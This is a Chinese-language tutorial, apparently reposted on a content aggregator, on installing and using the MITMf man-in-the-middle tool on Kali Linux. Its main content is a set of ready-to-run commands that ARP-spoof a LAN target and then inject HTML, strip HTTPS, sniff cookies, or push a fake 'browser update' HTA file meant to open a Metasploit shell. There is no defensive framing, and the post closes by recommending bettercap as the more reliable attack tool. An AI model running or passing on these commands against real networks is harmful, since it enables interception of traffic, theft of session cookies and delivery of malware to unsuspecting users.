局域网中间人:MITMf使用
Posted 方方和圆圆
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了局域网中间人:MITMf使用相关的知识,希望对你有一定的参考价值。
系统环境:kali
安装流程参考github官方地址:https://github.com/byt3bl33d3r/MITMf/wiki/Installation
安装相关依赖:
apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file
下载项目:
git clone https://github.com/byt3bl33d3r/MITMf
安装相关的子项目和依赖:
cd MITMf && git submodule init && git submodule update --recursive
安装相关依赖:
pip install -r requirements.txt
启动并查看MITMf的帮助文件:
python mitmf.py -h
MITMf的插件挺多的
基本功能介绍
在网页中注入html代码:
python mitmf.py -i wlan0 --spoof --arp --target 172.16.42.131 --gateway 172.16.42.1 --inject --html-payload \'<h1>6666666666666666666</h1>\'
让目标机器浏览的图片全部翻转:
python mitmf.py -i wlan0 --spoof --arp --target 172.16.42.131 --gateway 172.16.42.1 --upsidedownternet
启动sslstrip,把所有的https请求转化为http请求
python mitmf.py -i wlan0 --spoof --arp --target 172.16.42.131 --gateway 172.16.42.1 --hsts
在目标机器的 网页中注入 hta 文件, 诱导用户下载, 配合metaspolit可以直接得到shell:
python mitmf.py -i wlan0 --spoof --arp --target 172.16.42.131 --gateway 172.16.42.1 --hta --text "更新浏览器"
监听目标用户的cookies
python mitmf.py -i wlan0 --spoof --arp --target 172.16.42.131 --gateway 172.16.42.1 --ferretng
总体来说, 功能非常强大,但是运行的时候, 被攻击的目标机器经常会卡死, 导致网页无法打开 , 用户体验不好, 所以还是用bettercap更靠谱
作者: NONO
出处:http://www.cnblogs.com/diligenceday/
企业网站:http://www.idrwl.com/
开源博客:http://www.github.com/sqqihao
QQ:287101329
微信:18101055830
以上是关于局域网中间人:MITMf使用的主要内容,如果未能解决你的问题,请参考以下文章
Spring Rest 文档。片段生成时 UTF-8 中间字节无效 [重复]
Express实战 - 应用案例- realworld-API - 路由设计 - mongoose - 数据验证 - 密码加密 - 登录接口 - 身份认证 - token - 增删改查API(代码片段